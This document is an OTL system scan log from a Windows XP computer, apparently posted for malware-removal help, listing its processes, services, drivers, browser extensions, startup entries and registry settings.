PRC - [2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
PRC - [2010/05/13 00:16:26 | 000,049,321 | ---- | M] (The Pidgin developer community) -- C:\Program Files\Pidgin\pidgin.exe
PRC - [2010/05/10 05:48:25 | 001,917,616 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\a-squared Anti-Malware\a2service.exe
PRC - [2010/05/08 18:10:00 | 003,646,344 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\Emsisoft Anti-Malware\a2guard.exe
PRC - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
PRC - [2010/04/28 18:33:24 | 005,350,912 | ---- | M] (DonationCoder.com) -- C:\Program Files\FindAndRunRobot\FindAndRunRobot.exe
PRC - [2010/04/01 11:26:20 | 003,939,704 | ---- | M] (Sysinternals - www.sysinternals.com) -- C:\Program Files\procexp.exe
PRC - [2010/04/01 05:16:20 | 000,357,696 | ---- | M] (DT Soft Ltd) -- C:\Program Files\DAEMON Tools Lite\DTLite.exe
PRC - [2010/03/30 11:16:16 | 001,820,040 | ---- | M] (LogMeIn Inc.) -- C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2010/03/30 11:16:12 | 001,107,336 | ---- | M] (LogMeIn Inc.) -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
PRC - [2010/03/09 09:58:32 | 001,738,352 | ---- | M] (PeerBlock, LLC) -- C:\Program Files\PeerBlock\peerblock.exe
PRC - [2010/02/26 01:10:20 | 021,979,992 | ---- | M] () -- C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe
PRC - [2010/02/12 17:24:25 | 001,953,792 | ---- | M] () -- c:\Snort\bin\snort.exe
PRC - [2010/01/18 21:43:02 | 000,124,256 | ---- | M] (CANON INC.) -- C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE
PRC - [2009/12/10 11:27:26 | 000,357,384 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\LGDevAgt.exe
PRC - [2009/12/10 11:25:16 | 003,203,080 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe
PRC - [2009/12/10 11:00:42 | 001,573,384 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe
PRC - [2009/12/10 11:00:32 | 000,522,760 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\Applets\LCDMedia.exe
PRC - [2009/12/10 11:00:12 | 000,676,360 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\GamePanel Software\Applets\LCDClock.exe
PRC - [2009/09/16 22:14:48 | 000,153,608 | ---- | M] (Logitech Inc.) -- C:\Program Files\Logitech\Gaming Software\LWEMon.exe
PRC - [2009/07/20 13:30:50 | 000,813,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\SetPoint.exe
PRC - [2009/07/10 13:42:32 | 000,055,824 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.exe
PRC - [2008/04/14 06:42:20 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2008/04/14 06:42:16 | 000,389,120 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\cmd.exe


[color=#E56717]========== Modules (SafeList) ==========[/color]

MOD - [2010/05/13 20:31:33 | 000,570,880 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
MOD - [2010/05/10 05:47:53 | 000,212,896 | ---- | M] (Emsi Software GmbH) -- C:\Program Files\a-squared Anti-Malware\a2hooks32.dll
MOD - [2009/07/20 13:29:06 | 000,045,584 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\lgscroll.dll
MOD - [2009/07/20 13:25:46 | 000,017,424 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\IMHook.dll
MOD - [2009/07/20 13:25:22 | 000,064,016 | ---- | M] (Logitech, Inc.) -- C:\Program Files\Logitech\SetPoint\GameHook.dll
MOD - [2009/07/12 02:12:06 | 000,632,656 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
MOD - [2008/04/14 06:40:22 | 000,110,592 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\msscript.ocx


[color=#E56717]========== Win32 Services (SafeList) ==========[/color]

SRV - File not found [Disabled | Stopped] --  -- (AQLOPB)
SRV - [2010/05/10 05:48:25 | 001,917,616 | ---- | M] (Emsi Software GmbH) [Auto | Running] -- C:\Program Files\a-squared Anti-Malware\a2service.exe -- (a2AntiMalware)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [On_Demand | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Web Scanner)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [On_Demand | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Mail Scanner)
SRV - [2010/05/06 16:59:38 | 000,040,384 | ---- | M] (ALWIL Software) [Auto | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus)
SRV - [2010/03/30 11:16:12 | 001,107,336 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- C:\Program Files\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2009/12/24 17:02:30 | 000,311,568 | ---- | M] (IObit) [Disabled | Stopped] -- C:\Program Files\IObit\IObit Security 360\is360srv.exe -- (IS360service)
SRV - [2009/10/29 11:22:50 | 030,603,640 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)
SRV - [2009/10/20 14:19:48 | 000,117,264 | ---- | M] (CACE Technologies, Inc.) [Disabled | Stopped] -- C:\Program Files\WinPcap\rpcapd.exe -- (rpcapd) Remote Packet Capture Protocol v.0 (experimental)
SRV - [2009/09/26 05:28:22 | 004,639,136 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)
SRV - [2009/08/05 23:48:42 | 000,704,864 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Family Safety\fsssvc.exe -- (fsssvc)
SRV - [2009/07/20 13:28:10 | 000,121,360 | ---- | M] (Logitech, Inc.) [Disabled | Stopped] -- C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe -- (LBTServ)
SRV - [2009/07/17 09:32:00 | 003,576,320 | ---- | M] (Native Instruments GmbH) [Disabled | Stopped] -- C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe -- (NIHardwareService)
SRV - [2006/12/09 01:17:32 | 000,061,440 | ---- | M] (Digidesign, A Division of Avid Technology, Inc.) [Disabled | Stopped] -- C:\Program Files\Digidesign\Drivers\MMERefresh.exe -- (DigiRefresh)
SRV - [2005/11/17 14:18:52 | 001,527,900 | ---- | M] (MAGIX®) [Disabled | Stopped] -- C:\Program Files\MAGIX\Common\Database\bin\fbserver.exe -- (FirebirdServerMAGIXInstance)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV - [2010/05/11 15:02:10 | 000,017,488 | ---- | M] (Windows (R) 2000 DDK provider) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\gdrv.sys -- (gdrv)
DRV - [2010/05/11 14:54:31 | 000,023,456 | ---- | M] (Phoenix Technologies) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\DrvAgent32.sys -- (DrvAgent32)
DRV - [2010/05/10 05:47:52 | 000,011,776 | ---- | M] (Emsi Software GmbH) [Kernel | System | Running] -- C:\Program Files\a-squared Anti-Malware\a2util32.sys -- (a2util)
DRV - [2010/05/10 05:47:51 | 000,071,008 | ---- | M] (Emsi Software GmbH) [File_System | On_Demand | Running] -- C:\Program Files\a-squared Anti-Malware\a2accx86.sys -- (a2acc)
DRV - [2010/05/10 05:47:50 | 000,039,576 | ---- | M] (Emsi Software GmbH) [File_System | System | Running] -- C:\Program Files\a-squared Anti-Malware\a2dix86.sys -- (a2injectiondriver)
DRV - [2010/05/06 16:39:23 | 000,046,672 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2010/05/06 16:39:00 | 000,164,048 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aswSP.sys -- (aswSP)
DRV - [2010/05/06 16:34:27 | 000,023,376 | ---- | M] (ALWIL Software) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\aswRdr.sys -- (aswRdr)
DRV - [2010/05/06 16:33:59 | 000,100,432 | ---- | M] (ALWIL Software) [File_System | Auto | Running] -- C:\WINDOWS\system32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2010/05/06 16:33:47 | 000,019,024 | ---- | M] (ALWIL Software) [File_System | Auto | Running] -- C:\WINDOWS\system32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2010/05/06 16:33:29 | 000,028,880 | ---- | M] (ALWIL Software) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2010/04/09 13:16:50 | 000,016,472 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\pwdrvio.sys -- (pwdrvio)
DRV - [2010/04/09 13:16:46 | 000,011,104 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\pwdspio.sys -- (pwdspio)
DRV - [2010/04/03 18:55:31 | 010,232,128 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nv4_mini.sys -- (nv)
DRV - [2010/03/23 07:29:50 | 005,881,376 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService) Service for Realtek HD Audio (WDM)
DRV - [2010/03/09 09:58:30 | 000,018,544 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Program Files\PeerBlock\pbfilter.sys -- (pbfilter)
DRV - [2010/02/14 01:13:11 | 000,691,696 | ---- | M] () [Kernel | Boot | Running] -- C:\WINDOWS\System32\Drivers\sptd.sys -- (sptd)
DRV - [2010/02/03 15:56:56 | 000,026,176 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hamachi.sys -- (hamachi)
DRV - [2010/02/03 00:52:08 | 004,605,952 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\ati2mtag.sys -- (ati2mtag)
DRV - [2010/01/28 10:25:05 | 000,058,600 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\nvhda32.sys -- (NVHDA)
DRV - [2009/11/26 17:08:46 | 000,399,424 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tascusb2.sys -- (TASCAM_US122144)
DRV - [2009/11/26 17:08:42 | 000,039,488 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tscusb2a.sys -- (TASCAM_US144_MK2_WDM)
DRV - [2009/11/26 17:08:40 | 000,026,688 | ---- | M] (TASCAM) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\tscusb2m.sys -- (TASCAM_US144_MK2_MIDI)
DRV - [2009/11/23 18:37:18 | 000,014,856 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LGVirHid.sys -- (LGVirHid)
DRV - [2009/11/23 18:37:08 | 000,019,720 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV - [2009/11/17 19:17:00 | 001,395,800 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Monfilt.sys -- (Monfilt)
DRV - [2009/11/17 19:16:00 | 001,691,480 | ---- | M] (Creative) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\Ambfilt.sys -- (Ambfilt)
DRV - [2009/10/20 14:19:44 | 000,050,704 | ---- | M] (CACE Technologies, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\npf.sys -- (NPF)
DRV - [2009/09/11 13:48:04 | 000,066,056 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmXlCore.sys -- (WmXlCore)
DRV - [2009/09/11 13:47:54 | 000,014,984 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmVirHid.sys -- (WmVirHid)
DRV - [2009/09/11 13:47:32 | 000,035,592 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmFilter.sys -- (WmFilter)
DRV - [2009/09/11 13:47:22 | 000,022,792 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\WmBEnum.sys -- (WmBEnum)
DRV - [2009/08/05 23:48:42 | 000,054,752 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\fssfltr_tdi.sys -- (fssfltr)
DRV - [2009/06/17 12:56:16 | 000,037,392 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LMouFilt.Sys -- (LMouFilt)
DRV - [2009/06/17 12:56:06 | 000,035,472 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\LHidFilt.Sys -- (LHidFilt)
DRV - [2009/06/17 12:55:34 | 000,010,384 | ---- | M] (Logitech, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\LBeepKE.sys -- (LBeepKE)
DRV - [2009/04/08 02:46:22 | 000,189,968 | ---- | M] (Advanced Micro Devices, Inc) [Kernel | Boot | Running] -- C:\WINDOWS\system32\DRIVERS\ahcix86.sys -- (ahcix86)
DRV - [2008/04/13 23:06:06 | 000,144,384 | ---- | M] (Windows (R) Server 2003 DDK provider) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\hdaudbus.sys -- (HDAudBus)
DRV - [2008/02/27 12:49:00 | 000,003,840 | ---- | M] () [Kernel | System | Running] -- C:\WINDOWS\System32\Drivers\BANTExt.sys -- (BANTExt)
DRV - [2007/11/22 16:55:52 | 000,105,088 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\Rtenicxp.sys -- (RTLE8023xp)
DRV - [2007/07/20 19:40:10 | 000,084,992 | ---- | M] (ATI Research Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\AtiHdmi.sys -- (AtiHdmiService)
DRV - [2007/04/16 17:46:34 | 000,033,792 | ---- | M] (Advanced Micro Devices) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\AmdPPM.sys -- (AmdPPM)
DRV - [2006/12/08 22:50:34 | 000,011,776 | ---- | M] (Digidesign, A Division of Avid Technology, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\system32\drivers\diginet.sys -- (DigiNet)
DRV - [2006/10/16 03:03:36 | 000,072,608 | ---- | M] (PACE Anti-Piracy, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\TPkd.sys -- (TPkd)
DRV - [2006/07/01 23:39:40 | 000,036,864 | ---- | M] (Advanced Micro Devices) [Kernel | System | Stopped] -- C:\WINDOWS\system32\drivers\AmdK8.sys -- (AmdK8)
DRV - [2006/03/14 07:22:00 | 000,090,176 | ---- | M] (SafeNet, Inc.) [Kernel | Auto | Running] -- C:\WINDOWS\System32\Drivers\SENTINEL.SYS -- (Sentinel)
DRV - [2005/09/23 22:18:32 | 000,171,520 | ---- | M] (Pinnacle Systems GmbH) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\MarvinBus.sys -- (MarvinBus)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]


IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]


FF - HKLM\software\mozilla\Mozilla Firefox 3.6\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2010/04/25 11:50:08 | 000,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.6\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2010/04/25 11:50:08 | 000,000,000 | ---D | M]

[2010/02/12 23:18:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Extensions
[2010/02/12 23:18:27 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\1qvyaz9p.default\extensions
[2010/05/13 17:16:35 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions
[2010/02/13 00:21:01 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/02/13 00:21:01 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\Jody\extensions\personas@christopher.beard
[2010/05/12 10:46:26 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions
[2010/04/29 21:16:18 | 000,000,000 | ---D | M] (Weave Sync) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{340c2bbc-ce74-4362-90b5-7c26312808ef}
[2010/04/17 10:34:31 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
[2010/04/17 10:34:31 | 000,000,000 | ---D | M] (Easy Youtube Video Downloader) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{c0c9a2c7-2e5c-4447-bc53-97718bc91e1b}
[2010/05/01 10:18:47 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
[2010/04/09 19:14:24 | 000,000,000 | ---D | M] (Greasemonkey) -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}
[2010/02/13 00:20:59 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\DeviceDetection@logitech.com
[2010/04/13 20:52:45 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\personas@christopher.beard
[2010/03/21 09:38:54 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Me\Application Data\Mozilla\Firefox\Profiles\John\extensions\SkipScreen@SkipScreen
[2010/05/13 17:16:35 | 000,000,000 | ---D | M] -- C:\Program Files\Mozilla Firefox\extensions
[2010/04/20 16:41:04 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA}
[2009/11/19 17:16:28 | 000,091,552 | ---- | M] (Coupons, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npCouponPrinter.dll
[2010/04/12 17:29:19 | 000,411,368 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npdeployJava1.dll
[2010/04/07 20:35:03 | 000,075,208 | ---- | M] (Foxit Software Company) -- C:\Program Files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
[2009/11/19 17:16:29 | 000,091,552 | ---- | M] (Coupons, Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npMozCouponPrinter.dll
[2007/03/09 19:16:44 | 000,189,496 | ---- | M] (Yahoo! Inc.) -- C:\Program Files\Mozilla Firefox\plugins\npyaxmpb.dll

O1 HOSTS File: ([2004/08/04 06:00:00 | 000,000,734 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O4 - HKLM..\Run: [a-squared] C:\Program Files\Emsisoft Anti-Malware\a2guard.exe (Emsi Software GmbH)
O4 - HKLM..\Run: [IJNetworkScanUtility] C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE (CANON INC.)
O4 - HKLM..\Run: [Kernel and Hardware Abstraction Layer] C:\WINDOWS\KHALMNPR.Exe (Logitech, Inc.)
O4 - HKLM..\Run: [KernelFaultCheck]  File not found
O4 - HKLM..\Run: [Launch LCDMon] C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe (Logitech Inc.)
O4 - HKLM..\Run: [Launch LGDCore] C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe (Logitech Inc.)
O4 - HKLM..\Run: [Launch LgDeviceAgent] C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe (Logitech Inc.)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [MSConfig] C:\WINDOWS\pchealth\helpctr\Binaries\MSCONFIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [NvCplDaemon] C:\WINDOWS\System32\NvCpl.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [NvMediaCenter] C:\WINDOWS\System32\NvMcTray.DLL (NVIDIA Corporation)
O4 - HKLM..\Run: [Start WingMan Profiler] C:\Program Files\Logitech\Gaming Software\LWEMon.exe (Logitech Inc.)
O4 - HKCU..\Run: [DAEMON Tools Lite] C:\Program Files\DAEMON Tools Lite\DTLite.exe (DT Soft Ltd)
O4 - HKCU..\Run: [PeerBlock] C:\Program Files\PeerBlock\peerblock.exe (PeerBlock, LLC)
O4 - HKCU..\Run: [Pidgin] C:\Program Files\Pidgin\pidgin.exe (The Pidgin developer community)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe (Logitech, Inc.)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Dropbox.lnk = C:\Documents and Settings\Me\Application Data\Dropbox\bin\Dropbox.exe ()
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Find And Run Robot.lnk = C:\Program Files\FindAndRunRobot\FindAndRunRobot.exe (DonationCoder.com)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to procexp.lnk = C:\Program Files\procexp.exe (Sysinternals - www.sysinternals.com)
O4 - Startup: C:\Documents and Settings\Me\Start Menu\Programs\Startup\Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutorun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O8 - Extra context menu item: Add to &Evernote - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra Button: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O9 - Extra 'Tools' menuitem : Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll (Evernote Corporation)
O15 - HKCU\..Trusted Domains: ketsujin.com ([fighterace] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([primary] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([update] https in Trusted sites)
O15 - HKCU\..Trusted Domains: ketsujin.com ([www] https in Trusted sites)
O15 - HKCU\..Trusted Domains: stormofaces.com ([www] https in Trusted sites)
O16 - DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} http://download.gigabyte.com.tw/object/Dldrv.ocx (Dldrv2 Control)
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab (Symantec AntiVirus scanner)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\Yinsthelper.dll (Installation Support)
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab (DLM Control)
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab (Symantec RuFSI Utility Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {CAFEEFAC-0016-0000-0020-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_20-windows-i586.cab (Java Plug-in 1.6.0_20)
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} http://download.mcafee.com/molbin/iss-loc/mcfscan/2,2,0,5894/mcfscan.cab (McFreeScan Class)
O18 - Protocol\Handler\belarc {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files\Belarc\Advisor\System\BAVoilaX.dll (Belarc, Inc.)
O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
O18 - Protocol\Handler\vbscript {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - Reg Error: Key error. File not found
O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\AtiExtEvent: DllName - Ati2evxx.dll - C:\WINDOWS\System32\ati2evxx.dll (ATI Technologies Inc.)
